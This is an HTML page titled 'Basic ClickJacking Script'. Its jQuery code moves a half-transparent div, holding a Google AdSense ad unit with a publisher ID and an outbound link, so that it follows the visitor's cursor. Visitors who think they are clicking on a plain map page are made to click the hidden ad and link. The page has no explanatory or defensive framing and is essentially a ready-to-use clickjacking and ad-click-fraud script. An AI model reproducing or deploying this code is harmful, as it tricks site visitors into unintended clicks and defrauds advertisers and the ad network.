<html> 
<head> 
                <title>Basic ClickJacking Script</title>
               <script src="jquery-1.4.2.min.js" type="text/javascript"></script>
    <style> 
                html, body { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; }
        div.wrax { width: 100%; height: 100%; overflow: auto; }
        img.bg { min-height: 100%; min-width: 1024px; width: 100%; height: 100%; position: fixed; top: 0; left: 0; z-index: 0; }
        @media screen and (max-width: 1024px) { img.bg { left: 50%; margin-left: -512px; } }
        #mis { text-align: center; position: absolute; width: 100%; height: 100%; top: 0; left: 0; color: #fff; font-family: 'palatino linotype', palatino; font-weight: normal; text-align: left; text-shadow: 0 1px 0 #000; z-index: 10; }
        #mis .description { position: relative; width: 580px; left: 50%; margin-left: -290px; }
        #mis .description h1 { font-size: 32px; }
        #mis .description .warning { color: #f00; }
        #mis .description .link, #mis .description a { font-size: 22px; color: #fff; text-decoration: underline; }
        #mis .description .footer, #mis .description .footer a { font-size: 10px; }
    </style> 
</head> 
<body><span id="link" class="link">
 
<h1>Test</h1>
 
    <div id="mis"> 
                   <div align="center">
 
            <img src="black-whtie-world-map.jpg" width="800" height="457"/>
           </div> 
    </div> 
    <div id="wrax" style="position: absolute; opacity: 0.5; filter: alpha(opacity = 50); margin-left: -50px; z-index: 100;"> 
 
 
 
<a href="http://www.navoditkumar.com" target="_blank" title="Indian">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- animeveer_main_Blog1_300x250_as -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-5996828242175180"
     data-ad-slot="1604481956"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<img src="Indian-Flag.gif" alt="India" ></a>
 
    </div> 
    <script type="text/javascript"> 
        jQuery( document ).ready( function() {
            $( "#link" ).mousemove( function( e ) {
                $( '#wrax' ).css( {
                    top: e.pageY - 17,
                    left: e.pageX - 8
                } );
            } );
        } )
    </script> 
 
</span></body> 
</html>
